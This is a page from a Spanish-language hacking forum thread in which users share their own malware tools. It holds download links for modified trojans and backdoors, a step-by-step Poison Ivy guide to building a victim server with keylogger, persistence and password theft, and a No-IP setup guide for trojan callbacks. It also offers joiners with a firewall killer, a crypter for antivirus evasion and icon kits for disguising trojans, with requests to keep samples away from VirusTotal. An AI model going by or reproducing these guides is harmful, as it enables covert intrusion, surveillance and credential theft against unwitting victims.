elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
21 Agosto 2008, 14:49  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Man-in-the-Middle, Hendriҳ)
| | |-+  Contribuciones usuarios elhacker.net
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 4 5 Ir Abajo Imprimir
Autor Tema: Contribuciones usuarios elhacker.net  (Leído 28059 veces)
WHK

Desconectado Desconectado

Mensajes: 790


+-=[Yan]=-+


Ver Perfil WWW
Re: Contribuciones usuarios hacker.net
« Respuesta #15 en: 23 Marzo 2007, 10:39 »

kuang II 4ever    http://www.geocities.com/yan_uniko_102/kuang2.zip



este troyano lo saque de un ezine y le hice algunas modificaciones para que no fuera tan facil de detectar. El infector.exe infecta el ejecutable que tu quieras y lo envias a la victima.. despues te conectas a traves del cliente y eso es todo. DONDE ESTÁ LA GRACIA DE ESTE TROYANO!! Y LA P** MADRE... trankilo.. no os escandaliceis... la gracia es que cuando la victima se infecta.. este troyano infecta a todos los demas archivos de la pc y Aunque borre el original tendria que borrar todo lo que tiene como para deshacerse de el XD pero trankilo... es controlable... si te autoinfectas.. puedes desinfectarte con el mismo cliente. Ademas infecta el kernel entre otras cosas XD
« Última modificación: 31 Marzo 2007, 06:42 por WHK » En línea

-The Hacktivism is not a crimen.
- Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática.
- Richard Stallman: "GNU (GNU No es Unix)".
- Mi web: http://whkfilemanager.sourceforge.net/ - http://www.jccharry.com/

LeandroA

Conectado Conectado

Mensajes: 294


Ver Perfil
Re: Contribuciones usuarios hacker.net
« Respuesta #16 en: 03 Abril 2007, 10:40 »

SERVER - AT

server para acceder a nuestra pc atraves de nuestro navegador (IEXPLORER, FIREFOX,ETC.)



http://ar.geocities.com/leandroascierto/Server-AT.zip

para utilizarlo, una vez iniciado el server ponen en su navegador

http://127.0.0.1/

o

http://localhost/

o bien hacerlo atraves de internet ponen la ip del pc que ejcuta el server por ejemplo

http://201.253.188.97/

Tambien pueden poner si tienen un no-ip, pero este tambien trae una opcion de crear un no-ip o pagina de redirecionamiento.


el codigo esta incluido y cualquier duda esta la ayuda en el proyecto, o bien pueden postearlas aqui en el foro

bien como veran en las imagenes las opciones que tiene, e inclusive puede levantar paginas no muy grandes en formato htm o html desde el propio server (pero esto ultimo no es muy efeciente ya que no pude solucionar unos problemas de sobrecarga de memoria que ocaciona el winsock)


Mis agradecimientos a SKL por su colaboracion  ;)

Saludos
En línea

kasxh

Desconectado Desconectado

Mensajes: 22



Ver Perfil
Manual Poison Ivy 2.1.1
« Respuesta #17 en: 05 Abril 2007, 14:51 »

Este es un pequeño manual de como utilizar y crear el server.exe con el Poison Ivy 2.1.1 o 2.2 primero q nada lo descargamos:
Poison Ivy 2.2
Poison IvyVERSION PRIVADA ;D

Empezamos con la configuracion del troyano,bueno primero explico toda este pantalla: Pestaña Connections

ID. Es el nombre q le pusimos a la victima.
WAN. Es la IP de la victima en ese momento.
LAN. Es la IP de la red de la victima.
COMPUTER. Es la pc q utiliza la victima,nombre etc.
USER NAME. Muestra el nombre de usuario de la pc.
ACC TIPE. Muestra la sesion con q se entro en la pc,admin,invitado u otra cuenta...
O.S. Es el sistem operativo q utiliza la victima.
CPU. Nos dice los (MHz) q tiene la pc de la victima.
RAM. Nos dice la menoria RAM q tiene la victima,jajajajaj su pc claro xDDD
VERSION. Es la version del posion ivy instalada en la pc de la victima.
PING. Nos dice la velocidad de conexion cliente-server, si esta es muy ALTA dificulta la conexion hasta q puede q la perdamos,momentaneamante.

Ahora si vamos a la configuracion del poison Pestaña Build nos saldra esta pantalla:




DNS/PORT. Aqui ponemos nuestro dominio NO-IP q ya nos hemos creado sino es asi creense uno.Entramos en Add nos saldra esto:


Para comprovar si esta bien le damos en Test Conections si sale la _/ verde ok ;D si no es asi nos saldra una X roja :-\.
ID. Aqui el nombre q le ponemos a la victima,luego en el clente se puede cambiar dicho nombre.
PASSWORD. Si se le quiere poner contraseña al server.
Socks 4 -DNS/PORTS. Es para poner proxys,no es recomendable ya q relentiza la conexion.
ACTIVE-X KEY. Es para crear un registro en la pc de la victima,marquen la casilla STARTUP y ya esta para cambiar en RANDOM.
FILE NAME. Es el nombre con el q se instalara en la pc de la victima,poner uno q no llame la atencionxD.
COPY FILE TO: Es donde queremos q se instale nuestro server en system o windows.
MELT. Si la seleccionamos cuando la victima abra el server desaparecera,para probar con nosotros no es necesario activarla.
KEYLOGGER. Es para activar el Keylogger.
PERSISTENCE. Esta opcion dificulta borrar el server en la pc de la victima.
ADVANCED. No tocar.
ICON. Es para cambiar el icono al server.exe.
BUILD. Es para crear el server con toda la configuracion q le hemos dado,se crea en la carpeta donde esta el Poison Ivy.
Ahora vamos a la Pestaña Settings nos saldra esta pantalla:


LISTEN on PORT. Aqui ponemos el puerto q hemos puesto en BUILD.
PASSWORD. Aqui la contraseña q hemos puesto en BUILD si la hemos puestoxDDD.
FEATURES. Este apartado lo dejamos como esta,no se muy bien para q sirve :)D.
APPEARANCE. Aqui solo explico la opcion,Balloontip notification,sirve para cuando se conecta alguna victima nos aparezca un globo abajo en el reloj de win.
SAVE. Le damos a este para guardar la configuracion de esta pantalla.
Ahora vamos a la Pestaña Stats nos saldra esto:

Aqui nos dice la informacion de los datos enviados y recibidos,no nos deja ninguna opcion.
Vamos a la Pestaña About nos saldra esta pantalla:

No es nada importante solo autores y creditos xDDDD.
Vamos al tema, al hacer doble click en la victima q tenemos nos saldra esta pantalla:

Aqui nos muestra toda la informacion de la pc y el server.En la parte derecha estan todas las otras opciones q lleva el Poison Ivy,no las voy a explicar todas
infecten y descubran ;D ;D.
Bueno aqui una Screen capture:


Y lo mejor de todo Password List aqui estan todos los passwords de la victima: xDD


Hasta aqui el manual espero q les sea util.
Este manual no esta sacado de ninguna parte es BY FRANZA_110 :xD
« Última modificación: 05 Abril 2007, 14:53 por franza_110 » En línea
kasxh

Desconectado Desconectado

Mensajes: 22



Ver Perfil
Manual NO-IP
« Respuesta #18 en: 05 Abril 2007, 14:57 »

Esto es un mini tuto de como crearse una cuente NO-IP ya q se utiliza mucho para los troyanos.

Primero q nada vamos a la pagina del NO-IP para crear una cuenta se deben registrar: 
NO-IP  ;D
Pra registrarse vamos a Sign-up Now! y ponemos un e-mail valido y todos los datos q nos se pide una vez lleno le damos a I Accept.Create my Account,
ahora ya estamos registrados vamos a crear una no-ip,introducir los datos :

Una vez dentro vamos a "Hosts/Redirects" y clickean en "ADD A HOST".
Lo unico q tenemos q rellenar es Hostname: Ponen un nombre el q quieran ,si el nombre ya esta registrado nos avisara y deveran cambiarlo.
Luego seleccionamos un dominio q este dentro de "NO-IP Free Domains" (no-ip.org ,etc).
Host Type: Verificamos q este seleccionado DNS Host (A) una vez hecho esto vayan abajo y le damos a "Create Host" ya esta creado,vamos a ver si esta bien
volvemos a "Hosts/Redirects" y ahi saldra el dominio q hemos puesto por ejemplo ( loqsea.no-ip.org) xDD.
Vamos a decargarnos el DUC:
DUC
Instalamos el programa y nos aparecera esto:


Aqui ponemos los datos y contraseña q pusimos cuando nos registramos en NO-IP.
Luego aparecera esta otra pantalla:

Aqui nos aparecera la cuenta q creamos xxxxxxx.no-ip.org sino es asi algo han hecho mal revisenlo.Bueno hasta aqui este mini tuto espero q les sirva de ayuda
aunq ya ven q no es dificil crearse una NO-IP. :P :P
Este manual no esta sacado de ningun sitio es BY FRANZA_110
« Última modificación: 05 Abril 2007, 15:00 por franza_110 » En línea
||MadAntrax||
Lab Member
Moderador Global
*****
Desconectado Desconectado

Mensajes: 1.418


This is the end, my only friend, the end...


Ver Perfil WWW
Re: Contribuciones usuarios hacker.net
« Respuesta #19 en: 05 Abril 2007, 21:48 »

Actualizado Cactus Joiner 2.5

Os presento Cactus Joiner 2.5, un pequeño programa con el que podrás unir infinitos archivos en 1 solo. Podrás usar este programa para ocultar el server de un troyano junto con otra aplicación o foto para engañar a la victima. Aparte podrás elegir que archivos se van a ejecutar de forma normal o de forma oculta. Como novedad en esta nueva versión incluye un Firewall Killer, con esta opción activada haremos que nuestro troyano desactive el firewall de Windows XP. Aqui os dejo unas imagenes del programa:

Pantalla Principal


Opciones Avanzadas


Guardar el Joiner


Novedades versión 2.5
*- Añadido: Sistema de Firewall Killer
*- Añadido: Nuevo sistema de encriptación (StrReverse)
*- Añadido: Se pueden unir infinitos archivos en 1 solo!
*- Añadido: Opción para auto-ejecutar los archivos en Regedit
*- Añadido: Opción para personalizar la Deploy Folder.
*- Añadido: Opción para personalizar el Output Name.
*- Añadido: Opción para cambiar el icono del ejecutable.
*- Añadido: Contador de archivos en el listado.
*- Añadido: Contador de tamaño de archivos en el listado.
*- Añadido: Biblioteca con 69 iconos.
*- Mejora: El tamaño de cactus.dll (stub) se ha reducido.
*- Mejora: El icono por defecto de cactus.dll es invisible.
*- Mejora: Se ha mejorado el GUI (Graphic User Interface), más compacto.
*- Mejora: Ventana de Opciones Avanzadas.
*- Mejora: Mejora en el menú contextual del listado.
*- Mejora: El método de encriptación es ahora mucho más eficiente.
*- Mejoras en el código interno:
   (*) Mejoras en el control de errores
   (*) Ejecución y compilación del joiner un 35% más rápida
   (*) Agregado sistema de detección de falta de archivos (cactus.dll)
   (*) Se ha eliminado el objeto 'Scripting.FileSystemObject'

*- Se puede añadir cualquier formato de archivo: programas, fotos, textos, videos, mp3, etc...
*- Permite seleccionar la forma de ejecución de los archivos. (normal / oculto).
*- Permite seleccionar que archivo se va a auto-ejecutar por Regedit.
*- Firewall Killer, deshabilita el firewall de Windows XP.
*- Encriptación: Permite encriptar el contenido de los archivos. Si se incluye un troyano, este se volverá indetectable!
*- Se puede cambiar el icono del programa final
*- El archivo final puede ser con extensión: exe, com, bat, scr, cmd o pif.



Mejoras en la próxima versión 3.0
*- Se aumentará la biblioteca de icono con nuevas imágenes
*- Se añadirán idiomas para usuarios de habla no-hispana.
*- Se añadirán mas Firewalls para "matar" en el cactus.dll



AVISO IMPORTANTE: NO mandeis el archivo cactus.dll a virustotal ni a ningún antivirus online, de esta forma el Cactus permanecerá más tiempo indetectable, si por alguna razón el Cactus se vuelve detectado por los antivirus avísame y crearé una versión del cactus.dll en tan solo unos días.



ERROR: Si os aparece un mensaje de error al abrir el Cactus diciendo que os falta el archivo COMDLG32.OCX sigue leyendo...

1) Descarga el archivo COMDLG32.OCX aqui
2) Copia el archivo dentro de tu carpeta del sistema (C:\Windows\System32\COMDLG32.OCX)
3) Registra el OCX usando el comando: regsvr32 C:\Windows\System32\COMDLG32.OCX para ello escribe lo que hay en negrita dentro del cuadro Menu Inicio/Ejecutar y pulsa Enter
4) Disfruta de Cactus Joiner :P



Código fuente Open Source
Y por si fuera poco, el código fuente COMPLETO del Cactus Joiner será publicado en su sección correspondiente (Programación VB) y abierto para todo el público. Disfrutad

[Source] Cactus Joiner 2.5 FULL
http://foro.elhacker.net/index.php/topic,160470.0.html

=> Para descargarlo, haz click donde pone: Cactus_Joiner_2.5.zip
En línea

MSN Kick 1.5 (100%)
Cactus Joiner 3.0 (65%)
Cactus Metamorph 0.2.1 (100%)
Cactus Downloader (45%)
Cactus Keylogger (30%)
Cactus Worm Generator (20%)

Thor

Conectado Conectado

Mensajes: 1.197


Ver Perfil
Re: Contribuciones usuarios hacker.net
« Respuesta #20 en: 16 Abril 2007, 12:43 »

Citar
        -[ RedbindeR ]

Programado por: Thor
Página: www.Indetectables.net

Versión 2.0:
 Fecha: 09-04-07
 
  • Se puede seleccionar un tipo de autoinicio (4 tipos) para los archivos, asegurandonos su ejecución.
  • Posibilidad de introducir esperas, tanto de tiempo como de reinicios.
  • Capacidad de añadir información al registro.
  • Se puede ejecutar archivos en la instalación pasandoles parámetros.
  • Opción de encriptar los archivos bindeados.
  • Se puede añadir facilmente un stub modificado, agregando este en el directorio del editor con la extensión *.stb.
  • Viene con un stub con funcionalidad limitada de menor tamaño.
  • Posibilidad de autodestruirse tras haber ejecutado todas las acciones.
  • Se puede cambiar el compresor a utilizar, por defecto upx.
  • Mejora de la interfaz gráfica.
Capturas:


Manual:
http://www.freewebtown.com/indetectables/Manuales/RedbindeR2.0.pdf

Descarga, código fuente incluido para que fabriquéis vuestros propios stubs modificados:
http://www.freewebtown.com/indetectables/Redbinder2.0.1_Fix.rar

Saludos.
« Última modificación: 02 Mayo 2007, 23:59 por Thor » En línea
David Vans

Desconectado Desconectado

Mensajes: 146


Ver Perfil
Re: Contribuciones usuarios hacker.net
« Respuesta #21 en: 17 Abril 2007, 04:04 »

SMART WORLD

Hola a todos  ya por fin he termindo Smart World.

Ha sido mucho trabajo lo que me ha costado pero ya esta aqui
Puede que tentga algunos errores y me gustaria seguir trabajando para mejorarlo , Si  tine errores seria buena idea abrir un hilo sobre ese tema en el foro.
La aplicaicon esta diseñada en vb 6 mecesita que se registren ocx en systen32 pero eso lo dejo en vuestras manos podeis descargar esto desde aqui
si se os ocurre algo para que solo sea un el .exe  que descomprima los ocx correcto publicarlo.

Una vez que tenemos el control de la maquina le subimos un archivo esencial para mandar mensajes
Es porque si le mando un mensaje a al vicitma hasta que no responda no puedo seguir con el control entocnes pense que seria interesante que fuera otro poroceso el que mostrara el mensaje

-------------------------- Componentes --------------------
http://www.guapi.es/smart/Server.rar
http://www.guapi.es/smart/Client Smart World.rar
http://www.guapi.es/smart/ocx.rar
http://www.guapi.es/smart/winmsg.rar


------------------------------------------------------------------------
Os pongo un captura del cliente para que vallais viendo como es.

http://www.guapi.es/smart.html

Espero que os guste si me animo lo hago con c++ asi no harian falta ocx jajajaja

un Saludo de VANS
En línea
Dominicano

Desconectado Desconectado

Mensajes: 929


Ver Perfil
Re: Contribuciones usuarios hacker.net
« Respuesta #22 en: 17 Abril 2007, 16:08 »

hola, unos aportes mas, bueno aqui les dejo codigo fuente , de Msgbox remoto, que te mermite enviar msgbox remotamente, bueno lo podeis modificar, y añadircelos a vuestros troyanos, con sus funcion, que es para enviar msgbox falso a tu victima, bueno, metanle mano, espero que les guste.... me ubiera gustado poner una imagen pero es que no tengo ni idea en donde subir una imagen, bueno aqui esta en link para descargar

http://www.nakido.com/C276CEFF4C05BAA26BC3DBA8AC516FCA10786EED




« Última modificación: 10 Diciembre 2007, 21:31 por Dominicano » En línea

Fecha de nacimiento:
Año (0579 - Mes (10) - Día (25)
wACtOr

Desconectado Desconectado

Mensajes: 323


Premio finalista diseño web elhacker.net


Ver Perfil
El Jugete V1.0 by Wactor. 100% INDETECTABLE
« Respuesta #23 en: 04 Junio 2007, 21:50 »

Weno pos os presento mi primer troyano hecho en Visual Basic. Lo he ido haciendo segun el manual de la pagina de Kizar. Es un troyano Multi Conexion Inversa. No tiene muchas funciones, pero bueno, para ser el primero troyano que hago no esta mal. Os dejo unas imagenes:















Descargas

El Jugete 1.0 \/
     http://rapidshare.com/files/35255674/El_Jugete.rar
Manual \/
     http://rapidshare.com/files/35253606/Manual_El_Jugete.pdf

Contraseña por Privado, Solo usuarios con 50 mensajes o mas para garantizar un poco su indetectabilidad.
« Última modificación: 05 Junio 2007, 20:55 por wACtOr » En línea


NOIR

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Control Remote Noir-Hack Ver.1.0
« Respuesta #24 en: 17 Junio 2007, 23:13 »

Control Remote Noir-Hack Ver.1.0 Modificado De Remote Administrador


CONTROL REMOTE NOIR-HACK V.1.0
http://www.megaupload.com/?d=6DSAMUNO


Mas Mirrors En Mi Web


esperen un poco mas y pondre el codigo fuente
« Última modificación: 19 Junio 2007, 02:06 por NOIR » En línea
zumbah

Desconectado Desconectado

Mensajes: 34


...asi, cayéndose...


Ver Perfil
[INFO] PROGRAMA PARA ROBAR ICONOS A CUALQUIER .EXE O .DLL DE TU PC! [LEER]
« Respuesta #25 en: 19 Junio 2007, 23:24 »


XtraCT iCoN v2.0 FINALIZADA!

Al final despues de la cancelacion del programa, he vuelto a crearlo y a reformarlo y ya lo teneis aqui! Os digo sus caracteristicas:

XtraCT iCoN v2.0
- Potentisimo extractor de CUALQUIER icono de CUALQUIER aplicacion de vuestro PC para camuflar vuestros troyanos a la perfeccion.
- Soporta .exe y .dll
- Pack de iconos (Por si no encuentras el que quieres en tu PC, que lo dudo)
- Instrucciones

DESCARGAR

Gracias a todos por vuestro apollo en la anterior version 1.0 que consiguio mas de 150 descargas en 3 dias. Os quiero! :D


En línea



Excelente programa para extraer el icono de cualquier programa y engañar a tu victima! v2.0
http://rapidshare.com/files/37789681/XtraCT_iCoN.rar
EMISTREIN

Desconectado Desconectado

Mensajes: 36


-LA VIDA ES AHORA !VIVE HOY!


Ver Perfil WWW
RECOPILACION de ICONOS
« Respuesta #26 en: 22 Junio 2007, 01:47 »

Aportando algo, aqui una recopilacion de ICONOS, para cambiarle la imagen al archivo troyanisado.

http://www.mediafire.com/?e0w2nkf2jee

http://z15.zupload.com/download.php?file=getfile&filepath=46385

ambos link soi iguales..

Los iconos que se presentan, son sacados, de troyanos y joiners, como duck toy, msb,redbinder.
En línea

SERA QUE EL VIENTO SE CANSA? SI NO ES ASI POR QUE LEVANTA POLVO Y ARENA? .......
[VolkS]

Desconectado Desconectado

Mensajes: 284


[Argentina]


Ver Perfil
Re: Contribuciones usuarios hacker.net
« Respuesta #27 en: 30 Julio 2007, 18:03 »

Hola, bueno la verdad es que este proyecto no lo iba a terminar jamas ya que no ando mas en esto, decidi subirlo y compartirlo aca, el Server esta bastante el prolijo el cliente inverso (BackDoor),  esta desprolijo y tiene cosas q ya no usan en el codigo asique si lo quieren optimizar hagan como mas les guste.

Imagenes:








Espero que de algo les sirva, no estoy seguro si el source que subo tiene esa parte del filemanager, creo que la removi una ves porque no me convencia.

La transferencia de archivos la use de alguien no me acuerdo quien :/.

Descarga : http://www.freewebtown.com/volks/VolkS.zip
En línea

....
nhaalclkiemr

Desconectado Desconectado

Mensajes: 1.644


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Contribuciones usuarios hacker.net
« Respuesta #28 en: 19 Agosto 2007, 21:24 »

Vueno, pues aqui dejo mi aportación (aunke ya está en otro post):

StasFodidoCrypter 1.0 by nhaalclkiemr




Pues aqui os dejo mi crypter hecho en VB 6.0. Me gustaría que lo provarais y me dierais vuestras opiniones. Este crypter a diferencia de otros ejecuta el archivo en memoria, no crea uno temporal, por lo que debería ser indetectable a los antivirus incluso en su ejecución.

Por favor, no envíen ni el crypter ni el archivo encriptado a VIRUSTOTAL!!

-Descargas:

Mirror 1

Mirror 2

Mirror 3


-Clave del RAR:

Código:
StasFodidoCrypter 1.0 by nhaalclkiemr


Ahh, por cierto, está en gallego porque es mi lengua, pero no tendreis problema ninguno en entenderlo. Dadle buen uso.

Un saludo ;)
En línea

StasFodidoCrypter 1.0 - 100%
StasFodidoCrypter 2.0- 85%
Fire AV/FW-Killer - 97%

CUIDADO!!!!

LeandroA

Conectado Conectado

Mensajes: 294


Ver Perfil
Re: Contribuciones usuarios hacker.net
« Respuesta #29 en: 23 Septiembre 2007, 00:41 »

se trata de un Sever Ftp (No es un cliente)
Para aquellos que no saben bien de que les ablo se trata de una aplicacion la cual pueden transormar su pc en un host para crear cuentas de usuario y compartir archivos. los usuarios podran descargar o suvir archivos como si fuera un sitio web. bien, en la ayuda de la aplicacion esta mas detallado y con el corrector ortografico de word :D

algunas imagenes


El link para descargar el proyecto mas la aplicacion

Diógenes FTP

By Leandro Ascierto
En línea

Páginas: 1 [2] 3 4 5 Ir Arriba Imprimir 
Ir a:  





Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC